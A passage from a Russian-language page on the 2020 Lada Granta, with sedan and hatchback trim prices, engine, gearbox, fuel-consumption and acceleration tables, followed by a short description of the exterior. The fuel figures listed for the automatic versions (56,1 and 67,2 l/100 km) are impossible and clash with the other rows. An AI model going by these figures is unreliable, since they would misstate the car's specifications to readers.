659 800 рублей | бензин 1.6 л. (98 л.с) | AT | 9,9/56,1/67,2 | Передний | 13,1 с |
Luxe prestige | |||||
623 800 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,7 с |
648 800 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,2 с |
Хэтчбек
Комплектации | Мотор | КПП | Расход топлива | Привод | Разгон до 100 км/ч |
---|---|---|---|---|---|
Standard | |||||
461 900 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,9 с |
Classic | |||||
495 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,9 с |
Classic optima | |||||
521 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,9 с |
561 500 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,2 с |
Comfort | |||||
541 500 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,9 с |
556 500 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,7 с |
581 500 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,2 с |
611 500 рублей | бензин 1.6 л. (98 л.с) | AT | 9,9/56,1/67,2 | Передний | 13,1 с |
Luxe | |||||
579 800 рублей | бензин 1.6 л. (87 л.с) | MT | 9,1/5,3/6,8 | Передний | 11,9 с |
594 800 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,7 с |
619 800 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,2 с |
649 800 рублей | бензин 1.6 л. (98 л.с) | AT | 9,9/56,1/67,2 | Передний | 13,1 с |
Luxe prestige | |||||
613 800 рублей | бензин 1.6 л. (106 л.с) | MT | 8,7/5,2/6,5 | Передний | 10,7 с |
638 800 рублей | бензин 1.6 л. (106 л.с) | AMT | 8,7/5,2/6,5 | Передний | 12,2 с |
Экстерьер
В экстерьере актуальной версии Лады Гранты 2020 года выпуска хорошо читается фирменный стиль Lada с Х-графикой переднего бампера, крупной светотехникой и такой же большой хромированной эмблемой на радиаторной решетке.
https://www.youtube.com/watch?v=pLT6NGvw15s
В ряду последних улучшений – новые контуры багажника, где выштамповка еще больше подчеркивает оригинальную форму задних фонарей. Большие боковые зеркала, гарантирующие отличную обзорность, форсунки омывателя, покинувшие, наконец-то, капот – производитель постоянно улучшает свой бюджетный автомобиль, а в конце 2020 года вовсе обещает представить серьезно переработанный дизайн кузова, претендующий на полноценный рестайлинг или даже переход модели в следующее поколение.